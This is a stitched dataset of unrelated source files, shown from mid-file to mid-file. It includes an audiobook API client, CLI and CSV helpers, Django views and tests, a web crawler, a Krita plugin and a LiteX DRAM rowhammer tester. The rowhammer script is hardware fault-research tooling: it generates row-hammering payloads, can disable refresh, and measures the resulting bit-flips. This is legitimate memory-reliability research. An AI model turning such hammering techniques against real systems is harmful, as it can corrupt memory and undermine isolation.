result = re.search(r"Date\((.*)\+(.*)\)", aud_dt)
epoch_utc = result.group(1)
local_tz_offset = result.group(2)
try:
return datetime.utcfromtimestamp(
float(epoch_utc) if len(epoch_utc) < 11 else float(epoch_utc) / 1000
)
except (TypeError, ValueError) as e:
logger.error(str(e) + " Input epoch_utc: " + str(epoch_utc))
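# Worked example (editor's note):
#   epoch_to_datetime("/Date(1545693401480+0100)/")
# extracts "1545693401480" (13 digits, so it is treated as milliseconds and
# divided by 1000) and returns datetime.utcfromtimestamp(1545693401.48),
# i.e. 2018-12-24 23:16:41.480 UTC.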
def _get_hashed_password(user_password, salt):
"""
calculates hashed password
Salt can be get calling `login`
:param user_password:
:param salt:
:return:
"""
salt_bytes = struct.pack(">I", int(salt))
password_encoded = user_password.encode("utf-16le")
hash_bytes = hashlib.sha256(salt_bytes + password_encoded).digest()
hashed_password = binascii.hexlify(salt_bytes + hash_bytes).upper()
return bytes(hashed_password).decode()
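# Worked example (editor's note): for salt "1", struct.pack(">I", 1) yields
# b"\x00\x00\x00\x01"; the UTF-16LE password bytes are appended, the result
# is hashed with SHA-256, and salt_bytes + digest is hex-encoded upper-case,
# so _get_hashed_password("secret", "1") always starts with "00000001".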
def _post(endpoint, credentials, session=None, data=None, headers=None):
d, h = _merge_into_data_and_headers(
credentials, data, headers if headers else DEFAULT_HEADERS
)
s = session if session else requests.session()
#
r = s.post(AUDIOTEKA_API_URL + endpoint, data=d, headers=h)
j = r.json()
if j == "login_failed":
_set_response_login_failed(r)
elif j == "item_not_found":
_set_response_item_not_found(r)
r.raise_for_status()
return r
def _merge_into_data_and_headers(credentials, data, headers):
if not credentials:
return data, headers
ret_data = dict()
ret_headers = dict()
ret_data["userLogin"] = credentials["userLogin"]
if "userPassword" in credentials:
ret_data["userPassword"] = credentials["userPassword"]
else:
ret_headers["XMobileAudiotekaVersion"] = AUDIOTEKA_API_VERSION
ret_headers["XMobileTokenAuthentication"] = credentials["AuthenticationToken"]
ret_headers["XMobileUserLogin"] = credentials["userLogin"]
return _merge_dicts(data, ret_data), _merge_dicts(ret_headers, headers)
def _merge_dicts(*dict_args):
result = {}
for dictionary in dict_args:
result.update(dictionary)
return result
def _set_response_login_failed(r):
r.status_code = 401
r.reason = "Login failed"
def _set_response_item_not_found(r):
r.status_code = 404
r.reason = "Item not found"
```
|
{
"source": "jedrus2000/mapster",
"score": 2
}
|
#### File: mapster/mapster/tools.py
```python
import codecs
from io import StringIO
from pathlib import Path
import colorama
colorama.init()
from colorama import Fore, Back, Style
import click
import csv
import io
def echo_error(message=None, file=None, nl=True, err=True, color=None):
if message:
message = f"{Fore.RED}{message}{Fore.RESET}"
click.echo(message=message, file=file, nl=nl, err=err, color=color)
def echo_warning(message=None, file=None, nl=True, err=True, color=None):
if message:
message = f"{Fore.YELLOW}{message}{Fore.RESET}"
click.echo(message=message, file=file, nl=nl, err=err, color=color)
def get_file_utf8_encoding(file_path: Path):
first_bytes = min(32, file_path.stat().st_size)
with file_path.open('rb') as f:
raw = f.read(first_bytes)
if raw.startswith(codecs.BOM_UTF8):
return 'utf-8-sig'
else:
return 'utf-8'
def dict2csv(d: dict) -> str:
csvio: StringIO = io.StringIO(newline='')
writer = csv.DictWriter(csvio, fieldnames=list(d[next(iter(d))].keys()), dialect='excel', quoting=csv.QUOTE_ALL)
writer.writeheader()
for key, item in d.items():
writer.writerow(item)
return_value = csvio.getvalue()
csvio.close()
return return_value
def csv2dict(csv_file, key_name):
reader = csv.DictReader(csv_file)
result = {}
for d in reader:
result[d.get(key_name)] = d
return result
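# Example round trip (editor's sketch, not part of the original file):
#
#   rows = {"a": {"id": "a", "value": "1"}, "b": {"id": "b", "value": "2"}}
#   csv_text = dict2csv(rows)
#   parsed = csv2dict(io.StringIO(csv_text), key_name="id")
#   assert parsed["a"]["value"] == "1"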
```
|
{
"source": "jedrus2000/totra",
"score": 3
}
|
#### File: totra/totra/main.py
```python
from docopt import docopt
import totra
def __get_option_param(arguments, option_name, param_name=None):
if not param_name:
param_name = option_name
return arguments['<{0}>'.format(param_name)].split(',') if arguments['{0}'.format(option_name)] else None
def __get_option_value_list(arguments, option_name):
return arguments['{0}'.format(option_name)].split(',') if arguments['{0}'.format(option_name)] else None
def main():
arguments = docopt(__doc__, version='TopTracker helper. Version: {0}'.format(totra.__version__))
activities_command = arguments['activities']
how_much_hours_command = arguments['how_much_hours']
output_format = arguments['--format']
projects = __get_option_value_list(arguments, '--projects')
workers = __get_option_value_list(arguments, '--workers')
from_date = arguments['--from']
to_date = arguments['--to']
login_name = arguments['-l']
login_password = arguments['-p']
output_filename = arguments['-o']
if how_much_hours_command:
data = totra.how_much_hours(login_name, login_password, workers=workers,
projects=projects, start_date=from_date, end_date=to_date)
totra.save_output(data, output_filename)
if activities_command:
data = totra.report_activities(login_name, login_password, workers=workers,
projects=projects, start_date=from_date, end_date=to_date)
data_in_requested_format = totra.format_activities(data, format=output_format)
totra.save_output(data_in_requested_format, output_filename)
```
|
{
"source": "jedrzejasgard/USB_page",
"score": 2
}
|
#### File: src/usbcennik/views.py
```python
from django.http import HttpResponse
from django.shortcuts import render
from django.views.generic import View
from django.template.loader import get_template
from .utils import render_to_pdf
def home_page(request):
return render(request,'base.html')
def edycja_cen(request):
return render(request,'edytuj_ceny.html')
class GeneratePDF(View):
def get(self, request, *args , **kwargs):
template = get_template('cennikUSB.html')
context = {
'index': '19340' ,
'cena' : '12,40' ,
'data' : '12-30-2012'
}
html = template.render(context)
pdf = render_to_pdf('cennikUSB.html', context)
if pdf:
response = HttpResponse(pdf, content_type='application/pdf')
filename = "Cennik_USB.pdf"
content = 'inline; filename="%s"' %(filename)
download = request.GET.get('download')
if download:
content = 'attachment; filename="%s"' %(filename)
response['Content-Disposition'] = content
return response
        return HttpResponse('Something went wrong and the PDF was not generated')
```
|
{
"source": "jedrzejboczar/litex-rowhammer-tester",
"score": 2
}
|
#### File: rowhammer_tester/scripts/rowhammer.py
```python
import time
import random
import argparse
from math import ceil
from rowhammer_tester.gateware.payload_executor import Encoder, OpCode, Decoder
from rowhammer_tester.scripts.utils import (
memfill, memcheck, memwrite, DRAMAddressConverter, litex_server, RemoteClient,
get_litedram_settings, get_generated_defs)
################################################################################
def get_expected_execution_cycles(payload):
cycles = 0
for i, instr in enumerate(payload):
cycles += 1
if instr.op_code == OpCode.NOOP and instr.timeslice == 0: # STOP
break
elif instr.op_code == OpCode.LOOP:
# there should be no STOP or LOOP instructions inside loop body
body = payload[i - instr.jump:i]
cycles += instr.count * sum(ii.timeslice for ii in body)
else:
# -1 because we've already included 1 cycle for this instruction
cycles += instr.timeslice - 1
return cycles
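# Worked example (editor's note): for the payload [ACT(ts=5), PRE(ts=5),
# LOOP(count=3, jump=2), NOOP(ts=0)] the first pass costs 5 + 5 cycles, the
# LOOP adds 1 cycle plus 3 extra iterations of the 2-instruction body
# (3 * 10 cycles), and the terminating NOOP costs 1 cycle: 42 cycles total.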
# returns the number of refreshes issued
def encode_one_loop(*, unrolled, rolled, row_sequence, timings, encoder, bank, refresh_op, payload):
tras = timings.tRAS
trp = timings.tRP
trefi = timings.tREFI
trfc = timings.tRFC
local_refreshes = 1
payload.append(encoder.I(refresh_op, timeslice=trfc))
# Accumulate an extra cycle for the jump at the end to be conservative
accum = trfc + 1
for idx in range(unrolled):
for row in row_sequence:
if accum + tras + trp > trefi:
payload.append(encoder.I(refresh_op, timeslice=trfc))
                    # Invariant: the time between the beginnings of two
                    # consecutive refreshes is less than tREFI.
accum = trfc
local_refreshes += 1
accum += tras + trp
payload.extend(
[
encoder.I(
OpCode.ACT, timeslice=tras, address=encoder.address(bank=bank, row=row)),
encoder.I(OpCode.PRE, timeslice=trp,
address=encoder.address(col=1 << 10)), # all
])
jump_target = 2 * unrolled * len(row_sequence) + local_refreshes
assert jump_target < 2**Decoder.LOOP_JUMP
payload.append(encoder.I(OpCode.LOOP, count=rolled, jump=jump_target))
return local_refreshes * (rolled + 1)
def encode_long_loop(*, unrolled, rolled, **kwargs):
refreshes = 0
# fill payload so that we have >= desired read_count
count_max = 2**Decoder.LOOP_COUNT - 1
n_loops = ceil(rolled / (count_max + 1))
for outer_idx in range(n_loops):
if outer_idx == 0:
            loop_count = rolled % (count_max + 1)
if loop_count == 0:
loop_count = count_max
else:
loop_count -= 1
else:
loop_count = count_max
refreshes += encode_one_loop(unrolled=unrolled, rolled=loop_count, **kwargs)
return refreshes
def least_common_multiple(x, y):
gcd = x
rem = y
while (rem):
gcd, rem = rem, gcd % rem
return (x * y) // gcd
def generate_row_hammer_payload(
*,
read_count,
row_sequence,
timings,
bankbits,
bank,
payload_mem_size,
refresh=False,
verbose=True,
sys_clk_freq=None):
encoder = Encoder(bankbits=bankbits)
tras = timings.tRAS
trp = timings.tRP
trefi = timings.tREFI
trfc = timings.tRFC
if verbose:
print('Generating payload:')
for t in ['tRAS', 'tRP', 'tREFI', 'tRFC']:
print(' {} = {}'.format(t, getattr(timings, t)))
acts_per_interval = (trefi - trfc) // (trp + tras)
max_acts_in_loop = (2**Decoder.LOOP_JUMP - 1) // 2
repeatable_unit = min(
least_common_multiple(acts_per_interval, len(row_sequence)), max_acts_in_loop)
assert repeatable_unit >= len(row_sequence)
repetitions = repeatable_unit // len(row_sequence)
print(" Repeatable unit: {}".format(repeatable_unit))
print(" Repetitions: {}".format(repetitions))
read_count_quotient = read_count // repetitions
read_count_remainder = read_count % repetitions
refresh_op = OpCode.REF if refresh else OpCode.NOOP
# First instruction after mode transition should be a NOOP that waits until tRFC is satisfied
# As we include REF as first instruction we actually wait tREFI here
payload = [encoder.I(OpCode.NOOP, timeslice=max(1, trfc - 2, trefi - 2))]
refreshes = encode_long_loop(
unrolled=repetitions,
rolled=read_count_quotient,
row_sequence=row_sequence,
timings=timings,
encoder=encoder,
bank=bank,
refresh_op=refresh_op,
payload=payload)
refreshes += encode_long_loop(
unrolled=1,
rolled=read_count_remainder,
row_sequence=row_sequence,
timings=timings,
encoder=encoder,
bank=bank,
refresh_op=refresh_op,
payload=payload)
    # The MC refresh timer is reset on mode transition, so issue REF now;
    # this way it stays in sync with the MC.
payload.append(encoder.I(refresh_op, timeslice=1))
payload.append(encoder.I(OpCode.NOOP, timeslice=0)) # STOP
if verbose:
expected_cycles = get_expected_execution_cycles(payload)
print(
' Payload size = {:5.2f}KB / {:5.2f}KB'.format(
4 * len(payload) / 2**10, payload_mem_size / 2**10))
count = '{:.3f}M'.format(read_count /
1e6) if read_count > 1e6 else '{:.3f}K'.format(read_count / 1e3)
print(' Payload per-row toggle count = {} x{} rows'.format(count, len(row_sequence)))
print(
' Payload refreshes (if enabled) = {} ({})'.format(
refreshes, 'enabled' if refresh else 'disabled'))
time = ''
if sys_clk_freq is not None:
time = ' = {:.3f} ms'.format(1 / sys_clk_freq * expected_cycles * 1e3)
print(' Expected execution time = {} cycles'.format(expected_cycles) + time)
assert len(payload) <= payload_mem_size // 4
return encoder(payload)
################################################################################
class RowHammer:
def __init__(
self,
wb,
*,
settings,
nrows,
column,
bank,
rows_start=0,
no_refresh=False,
verbose=False,
plot=False,
payload_executor=False,
data_inversion=False):
for name, val in locals().items():
setattr(self, name, val)
self.converter = DRAMAddressConverter.load()
self._addresses_per_row = {}
@property
def rows(self):
return list(range(self.rows_start, self.nrows))
def addresses_per_row(self, row):
# Calculate the addresses lazily and cache them
if row not in self._addresses_per_row:
addresses = [
self.converter.encode_bus(bank=self.bank, col=col, row=row)
for col in range(2**self.settings.geom.colbits)
]
self._addresses_per_row[row] = addresses
return self._addresses_per_row[row]
def attack(self, row_tuple, read_count, progress_header=''):
# Make sure that the row hammer module is in reset state
self.wb.regs.rowhammer_enabled.write(0)
self.wb.regs.rowhammer_count.read() # clears the value
# Configure the row hammer attacker
assert len(
row_tuple
        ) == 2, 'Use BIST modules/Payload Executor to hammer a number of rows other than 2'
addresses = [
self.converter.encode_dma(bank=self.bank, col=self.column, row=r) for r in row_tuple
]
self.wb.regs.rowhammer_address1.write(addresses[0])
self.wb.regs.rowhammer_address2.write(addresses[1])
self.wb.regs.rowhammer_enabled.write(1)
row_strw = len(str(2**self.settings.geom.rowbits - 1))
def progress(count):
s = ' {}'.format(progress_header + ' ' if progress_header else '')
            s += 'Rows = {}, Count = {:5.2f}M / {:5.2f}M'.format(
                row_tuple, count / 1e6, read_count / 1e6)
print(s, end=' \r')
while True:
count = self.wb.regs.rowhammer_count.read()
progress(count)
if count >= read_count:
break
self.wb.regs.rowhammer_enabled.write(0)
progress(self.wb.regs.rowhammer_count.read()) # also clears the value
print()
def row_access_iterator(self, burst=16):
for row in self.rows:
addresses = self.addresses_per_row(row)
n = (max(addresses) - min(addresses)) // 4
base_addr = addresses[0]
yield row, n, base_addr
def check_errors(self, row_patterns, row_progress=16):
row_errors = {}
for row, n, base in self.row_access_iterator():
errors = memcheck(self.wb, n, pattern=row_patterns[row], base=base, burst=255)
row_errors[row] = [(addr, data, row_patterns[row]) for addr, data in errors]
if row % row_progress == 0:
print('.', end='', flush=True)
return row_errors
def errors_count(self, row_errors):
return sum(1 if len(e) > 0 else 0 for e in row_errors.values())
@staticmethod
def bitcount(x):
return bin(x).count('1') # seems faster than operations on integers
@classmethod
def bitflips(cls, val, ref):
return cls.bitcount(val ^ ref)
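    # Example: bitflips(0b1010, 0b0110) XORs to 0b1100 and returns 2,
    # i.e. two bits differ between the read value and the reference.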
def errors_bitcount(self, row_errors):
return sum(
sum(self.bitflips(value, expected)
for addr, value, expected in e)
for e in row_errors.values())
def display_errors(self, row_errors):
for row in row_errors:
if len(row_errors[row]) > 0:
print(
"Bit-flips for row {:{n}}: {}".format(
row,
sum(
self.bitflips(value, expected)
for addr, value, expected in row_errors[row]),
n=len(str(2**self.settings.geom.rowbits - 1))))
if self.verbose:
for i, word, expected in row_errors[row]:
base_addr = min(self.addresses_per_row(row))
addr = base_addr + 4 * i
bank, _row, col = self.converter.decode_bus(addr)
print(
"Error: 0x{:08x}: 0x{:08x} (row={}, col={})".format(addr, word, _row, col))
if self.plot:
from matplotlib import pyplot as plt
row_err_counts = [len(row_errors.get(row, [])) for row in self.rows]
plt.bar(self.rows, row_err_counts, width=1)
plt.grid(True)
plt.xlabel('Row')
plt.ylabel('Errors')
plt.show()
def run(self, row_pairs, pattern_generator, read_count, row_progress=16, verify_initial=False):
# TODO: need to invert data when writing/reading, make sure Python integer inversion works correctly
if self.data_inversion:
raise NotImplementedError('Currently only HW rowhammer supports data inversion')
print('\nPreparing ...')
row_patterns = pattern_generator(self.rows)
print('\nFilling memory with data ...')
for row, n, base in self.row_access_iterator():
memfill(self.wb, n, pattern=row_patterns[row], base=base, burst=255)
if row % row_progress == 0:
print('.', end='', flush=True)
        # make sure to synchronize with the writes (without this, a slower
        # connection may time out on the first read after writing)
self.wb.regs.ctrl_scratch.read()
if verify_initial:
print('\nVerifying written memory ...')
errors = self.check_errors(row_patterns, row_progress=row_progress)
if self.errors_count(errors) == 0:
print('OK')
else:
print()
self.display_errors(errors)
return
if self.no_refresh:
print('\nDisabling refresh ...')
self.wb.regs.controller_settings_refresh.write(0)
print('\nRunning row hammer attacks ...')
for i, row_tuple in enumerate(row_pairs):
s = 'Iter {:{n}} / {:{n}}'.format(i, len(row_pairs), n=len(str(len(row_pairs))))
if self.payload_executor:
self.payload_executor_attack(read_count=read_count, row_tuple=row_tuple)
else:
self.attack(row_tuple, read_count=read_count, progress_header=s)
if self.no_refresh:
print('\nReenabling refresh ...')
self.wb.regs.controller_settings_refresh.write(1)
print('\nVerifying attacked memory ...')
errors = self.check_errors(row_patterns, row_progress=row_progress)
if self.errors_count(errors) == 0:
print('OK')
else:
print()
self.display_errors(errors)
return
def payload_executor_attack(self, read_count, row_tuple):
sys_clk_freq = float(get_generated_defs()['SYS_CLK_FREQ'])
payload = generate_row_hammer_payload(
read_count=read_count,
row_sequence=row_tuple,
timings=self.settings.timing,
bankbits=self.settings.geom.bankbits,
bank=self.bank,
payload_mem_size=self.wb.mems.payload.size,
refresh=not self.no_refresh,
sys_clk_freq=sys_clk_freq,
)
print('\nTransferring the payload ...')
memwrite(self.wb, payload, base=self.wb.mems.payload.base)
def ready():
status = self.wb.regs.payload_executor_status.read()
return (status & 1) != 0
print('\nExecuting ...')
assert ready()
start = time.time()
self.wb.regs.payload_executor_start.write(1)
while not ready():
time.sleep(0.001)
elapsed = time.time() - start
print('Time taken: {:.3f} ms\n'.format(elapsed * 1e3))
################################################################################
def patterns_const(rows, value):
return {row: value for row in rows}
def patterns_alternating_per_row(rows):
return {row: 0xffffffff if row % 2 == 0 else 0x00000000 for row in rows}
def patterns_random_per_row(rows, seed=42):
rng = random.Random(seed)
return {row: rng.randint(0, 2**32 - 1) for row in rows}
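# Illustrative outputs of the pattern generators above (hedged; the random
# variant depends on the seed):
#   patterns_const([0, 1], 0xaaaaaaaa)      -> {0: 0xaaaaaaaa, 1: 0xaaaaaaaa}
#   patterns_alternating_per_row([0, 1, 2]) -> {0: 0xffffffff, 1: 0x00000000, 2: 0xffffffff}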
def main(row_hammer_cls):
parser = argparse.ArgumentParser()
parser.add_argument('--nrows', type=int, default=0, help='Number of rows to consider')
parser.add_argument('--bank', type=int, default=0, help='Bank number')
parser.add_argument('--column', type=int, default=512, help='Column to read from')
parser.add_argument(
'--start-row', type=int, default=0, help='Starting row (range = (start, start+nrows))')
parser.add_argument(
'--read_count',
type=float,
default=10e6,
help='How many reads to perform for single address pair')
parser.add_argument('--hammer-only', nargs=2, type=int, help='Run only the row hammer attack')
parser.add_argument(
'--no-refresh', action='store_true', help='Disable refresh commands during the attacks')
parser.add_argument(
'--pattern',
default='01_per_row',
choices=['all_0', 'all_1', '01_in_row', '01_per_row', 'rand_per_row'],
help='Pattern written to DRAM before running attacks')
parser.add_argument(
'--row-pairs',
choices=['sequential', 'const', 'random'],
default='sequential',
help='How the rows for subsequent attacks are selected')
parser.add_argument(
'--const-rows-pair',
type=int,
nargs='+',
required=False,
help='When using --row-pairs constant')
parser.add_argument(
'--plot', action='store_true',
        help='Plot error distribution')  # requires matplotlib and pyqt5 packages
parser.add_argument(
'--payload-executor',
action='store_true',
help='Do the attack using Payload Executor (1st row only)')
parser.add_argument('-v', '--verbose', action='store_true', help='Be more verbose')
parser.add_argument("--srv", action="store_true", help='Start LiteX server')
parser.add_argument(
"--experiment-no", type=int, default=0, help='Run preconfigured experiment #no')
parser.add_argument(
"--data-inversion", nargs=2, help='Invert pattern data for victim rows (divisor, mask)')
args = parser.parse_args()
if args.experiment_no == 1:
args.nrows = 512
args.read_count = 15e6
args.pattern = '01_in_row'
args.row_pairs = 'const'
args.const_rows_pair = 88, 99
args.no_refresh = True
if args.srv:
litex_server()
wb = RemoteClient()
wb.open()
    row_hammer = row_hammer_cls(
        wb,
        nrows=args.nrows,
        settings=get_litedram_settings(),
        column=args.column,
        bank=args.bank,
        rows_start=args.start_row,
        verbose=args.verbose,
        plot=args.plot,
        no_refresh=args.no_refresh,
        payload_executor=args.payload_executor,
        data_inversion=args.data_inversion)
if args.hammer_only:
row_hammer.attack(*args.hammer_only, read_count=args.read_count)
else:
rng = random.Random(42)
def rand_row():
return rng.randint(args.start_row, args.start_row + args.nrows)
assert not (
args.row_pairs == 'const' and not args.const_rows_pair), 'Specify --const-rows-pair'
row_pairs = {
'sequential': [(0 + args.start_row, i + args.start_row) for i in range(args.nrows)],
'const': [tuple(args.const_rows_pair) if args.const_rows_pair else ()],
'random': [(rand_row(), rand_row()) for i in range(args.nrows)],
}[args.row_pairs]
pattern = {
'all_0': lambda rows: patterns_const(rows, 0x00000000),
            'all_1': lambda rows: patterns_const(rows, 0xffffffff),  # key must match the --pattern choice
'01_in_row': lambda rows: patterns_const(rows, 0xaaaaaaaa),
'01_per_row': patterns_alternating_per_row,
'rand_per_row': patterns_random_per_row,
}[args.pattern]
row_hammer.run(row_pairs=row_pairs, read_count=args.read_count, pattern_generator=pattern)
wb.close()
if __name__ == "__main__":
main(row_hammer_cls=RowHammer)
```
|
{
"source": "jedrzejkozal/QuestionsAndAnswers",
"score": 2
}
|
#### File: ask/test/FriendsViewTest.py
```python
from django.shortcuts import reverse
from django.test import TestCase
from ..test.FriendsMixIn import *
from ..test.LoginMixIn import *
class FriendsViewTest(TestCase, FriendsMixIn, LoginMixIn):
def setUp(self):
self.create_users()
self.make_friends()
self.create_invitations()
def test_friends_relation_is_mutual(self):
self.assertEqual(
self.user1, self.user2.friends_second.all()[0].first)
self.assertEqual(self.user2, self.user1.friends.all()[0])
def test_GET_all_friends_are_returned(self):
self.login_user(username="TestUser1")
response = self.client.get(reverse('ask:friends'))
self.assertEqual(list(response.context['friends']),
[self.user2, self.user3, self.user5])
def test_GET_all_friends_of_user2_are_returned(self):
self.login_user(username="TestUser2")
response = self.client.get(reverse('ask:friends'))
self.assertEqual(list(response.context['friends']),
[self.user4, self.user1, self.user5])
def test_GET_recently_added_returns_sorted_friends_user1(self):
self.login_user(username="TestUser1")
response = self.client.get(reverse('ask:friends.recent'))
self.assertEqual(list(response.context['friends']),
[self.user5, self.user3, self.user2])
def test_GET_recently_added_returns_sorted_friends_user2(self):
self.login_user(username="TestUser2")
response = self.client.get(reverse('ask:friends.recent'))
self.assertEqual(list(response.context['friends']),
[self.user5, self.user4, self.user1])
def test_GET_recently_added_returns_sorted_friends_user5(self):
self.login_user(username="TestUser5")
response = self.client.get(reverse('ask:friends.recent'))
self.assertEqual(list(response.context['friends']),
[self.user6, self.user4, self.user3, self.user2, self.user1])
def test_GET_in_alphabetical_order_user1(self):
self.login_user(username="TestUser1")
response = self.client.get(reverse('ask:friends.alph'))
self.assertEqual(list(response.context['friends']),
[self.user2, self.user3, self.user5])
def test_GET_in_alphabetical_order_user2(self):
self.login_user(username="TestUser2")
response = self.client.get(reverse('ask:friends.alph'))
self.assertEqual(list(response.context['friends']),
[self.user1, self.user4, self.user5])
def test_GET_in_alphabetical_order_user5(self):
self.login_user(username="TestUser5")
response = self.client.get(reverse('ask:friends.alph'))
self.assertEqual(list(response.context['friends']),
[self.user1, self.user2, self.user3, self.user4, self.user6])
def test_GET_inv_call_context_show_invites_eq_True(self):
self.login_user(username="TestUser1")
response = self.client.get(reverse('ask:friends.inv'))
self.assertEqual(response.context['show_invites'], True)
def test_GET_inv_no_invitations_empty_query(self):
self.login_user(username="TestUser1")
response = self.client.get(reverse('ask:friends.inv'))
self.assertEqual(list(response.context['invitations']), [])
def test_GET_inv_context_invitations_for_user2(self):
self.login_user(username="TestUser2")
response = self.client.get(reverse('ask:friends.inv'))
self.assertEqual(list(response.context['invitations']), [self.user8])
def test_GET_inv_context_invitations_for_user8(self):
self.login_user(username="TestUser8")
response = self.client.get(reverse('ask:friends.inv'))
self.assertEqual(list(response.context['invitations']), [
self.user2, self.user5, self.user6, self.user3])
def test_GET_inv_context_invitations_for_user6(self):
self.login_user(username="TestUser6")
response = self.client.get(reverse('ask:friends.inv'))
self.assertEqual(list(response.context['invitations']), [
self.user8, self.user4])
```
#### File: ask/test/QuestionsMixIn.py
```python
from ..models import UserModel, AnswerModel, QuestionModel
class QuestionsMixIn:
def create_users(self):
self.test_user1 = UserModel(username="TestUser1")
self.test_user1.save()
self.test_user2 = UserModel(username="TestUser2")
self.test_user2.save()
self.test_user3 = UserModel(username="TestUser3")
self.test_user3.save()
def create_question1(self, with_answer=False):
if with_answer:
self.create_answer1()
answer = self.answer1
else:
answer = None
self.question1 = QuestionModel(
asked_by=self.test_user1, owner=self.test_user2, content="Test Question 1", answer=answer)
self.question1.save()
def create_question2(self, with_answer=False):
if with_answer:
self.create_answer2()
answer = self.answer2
else:
answer = None
self.question2 = QuestionModel(
asked_by=self.test_user3, owner=self.test_user2, content="Test Question 2", answer=answer)
self.question2.save()
def create_question3(self, with_answer=False):
if with_answer:
self.create_answer3()
answer = self.answer3
else:
answer = None
        self.question3 = QuestionModel(
            asked_by=self.test_user1, owner=self.test_user3, content="Test Question 3", answer=answer)
        self.question3.save()
def create_answer1(self):
self.answer1 = AnswerModel(content="Test Answer 1")
self.answer1.save()
def create_answer2(self):
self.answer2 = AnswerModel(content="Test Answer 2")
self.answer2.save()
def create_answer3(self):
self.answer3 = AnswerModel(content="Test Answer 3")
self.answer3.save()
```
|
{
"source": "jedrzejpolaczek/artificial_intelligence_templates",
"score": 3
}
|
#### File: ImageClassifier/predict_utils/print_results.py
```python
import json
def print_results(top_p: list, top_class: list, category_names: str):
    # Load the mapping from class index to category name used by the classifier
with open(category_names, 'r') as f:
cat_to_name = json.load(f)
    for probability, elem in zip(top_p, top_class):
        print(f"Flower: {cat_to_name[str(int(elem))]} : {probability * 100:.0f}%")
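# Example usage (hypothetical values; assumes a JSON file mapping class
# indices to flower names, e.g. a cat_to_name.json):
#   print_results([0.71, 0.12], [21.0, 3.0], 'cat_to_name.json')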
```
#### File: ImageClassifier/train_utils/get_loader.py
```python
import torch
from torchvision import transforms
from torchvision import datasets
def get_directories(data_dir: str) -> dict:
train_dir = data_dir + '/train'
valid_dir = data_dir + '/valid'
test_dir = data_dir + '/test'
return {'train': train_dir, 'valid': valid_dir, 'test':test_dir}
def get_transforms() -> dict:
train_transform = transforms.Compose([transforms.RandomRotation(30),
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],
[0.229, 0.224, 0.225])])
valid_transform = transforms.Compose([transforms.Resize(255),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],
[0.229, 0.224, 0.225])])
test_transform = transforms.Compose([transforms.Resize(255),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],
[0.229, 0.224, 0.225])])
return {'train': train_transform, 'valid': valid_transform, 'test':test_transform}
def get_datasets(directories: dict, transforms: dict) -> dict:
train_dataset = datasets.ImageFolder(directories['train'], transform=transforms['train'])
valid_dataset = datasets.ImageFolder(directories['valid'], transform=transforms['valid'])
test_dataset = datasets.ImageFolder(directories['test'], transform=transforms['test'])
return {'train': train_dataset, 'valid': valid_dataset, 'test':test_dataset}
def get_loader(data_dir: str) -> dict:
    # Build the train/valid/test directory paths from the given root path
directories = get_directories(data_dir)
    # Define the transforms for the training, validation and testing sets
transforms = get_transforms()
    # Load the datasets with ImageFolder for each split
datasets = get_datasets(directories, transforms)
    # Define the dataloaders using the image datasets and the transforms
train_loader = torch.utils.data.DataLoader(datasets['train'], batch_size=64, shuffle=True)
valid_loader = torch.utils.data.DataLoader(datasets['valid'], batch_size=32)
test_loader = torch.utils.data.DataLoader(datasets['test'], batch_size=32)
return {'train': train_loader, 'valid': valid_loader, 'test':test_loader}
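# Example usage (hedged; assumes data_dir contains train/, valid/ and test/
# subfolders laid out for torchvision's ImageFolder):
#   loaders = get_loader('flowers')
#   images, labels = next(iter(loaders['train']))  # images: roughly [64, 3, 224, 224]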
```
#### File: src/tests/test_root.py
```python
from http import HTTPStatus
import pytest
from httpx import AsyncClient
# Internal libraries
from main import app
@pytest.mark.asyncio
async def test_root():
async with AsyncClient(app=app, base_url="http://test") as ac:
response = await ac.get("/")
assert response.status_code == HTTPStatus.OK
assert response.json() == {"STATUS": "Klinesso Recommender API"}
```
|
{
"source": "jedrzejpolaczek/code_snippets",
"score": 3
}
|
#### File: code_snippets/Python/WebCrawler.py
```python
import requests
from bs4 import BeautifulSoup
def code_search(max_pages):
page = 1
print("Before")
while page <= max_pages:
print("In")
url = 'https://www.thenewboston.com/forum/recent_activity.php?page=' + str(page)
source_code = requests.get(url)
plain_txt = source_code.text
soup = BeautifulSoup(plain_txt, "html.parser")
with open("file_name.txt", 'w', encoding='UTF-8') as inFile:
inFile.write(plain_txt)
for link in soup.findAll('a'):
href = "https://www.thenewboston.com" + link.get('href')
title = link.string
#print(href)
#print(title)
get_single_item_data(href)
page += 1
print("After")
def get_single_item_data(item_url):
source_code = requests.get(item_url)
plain_txt = source_code.text
    soup = BeautifulSoup(plain_txt, "html.parser")  # explicit parser avoids a bs4 warning
for item_name in soup.findAll("a", {"class":"title"}):
print(item_name.string)
code_search(1)
```
|
{
"source": "jedStevens/material_exporter",
"score": 2
}
|
#### File: material_exporter/material_exporter/material_exporter.py
```python
import sys
import time
from PyQt5.QtWidgets import *
from krita import *
class MaterialExporterDocker(DockWidget):
def __init__(self):
super().__init__()
self.setWindowTitle('Material Exporter')
mainWidget = QWidget(self)
self.setWidget(mainWidget)
self.export_button = QPushButton("Export")
self.export_button.clicked.connect(self.export)
self.base_edit = QLineEdit("/home/user/")
self.model_edit = QLineEdit("model_name")
self.material_edit = QLineEdit("material_name")
mainWidget.setLayout(QFormLayout())
mainWidget.layout().addRow(QLabel("Base Project: "), self.base_edit)
mainWidget.layout().addRow(QLabel("Model: "), self.model_edit)
mainWidget.layout().addRow(QLabel("Material: "), self.material_edit)
mainWidget.layout().addRow(QLabel(""), self.export_button)
def canvasChanged(self, canvas):
pass
def set_base_layers(self, b, nodes):
for child in nodes:
child.setVisible(b)
def set_layer(self, n, b, nodes):
for child in nodes:
if str(child.name()) == n:
child.setVisible(b)
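    # These two helpers drive the export loop below: hide every top-level
    # layer, then re-show only 'bg' plus the texture map currently being
    # exported (a hedged reading of the intended workflow).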
def export(self):
doc = Krita.instance().activeDocument()
root = doc.rootNode()
nodes = root.childNodes()
# Texture Library
base_folder = self.base_edit.text()
# Character / Piece
project_folder = self.model_edit.text()
        # Object you're working on
base_name = self.material_edit.text()
format = '.png'
doc.setBatchmode(True)
original_v = []
for child in nodes:
original_v.append(child.visible())
for child in nodes:
if str(child.name()) == 'bg':
child.setVisible(True)
continue
            if str(child.name()) in ['ao', 'alb', 'rgh', 'mtl', 'emi'] and len(child.childNodes()) > 0:
self.set_base_layers(False, nodes)
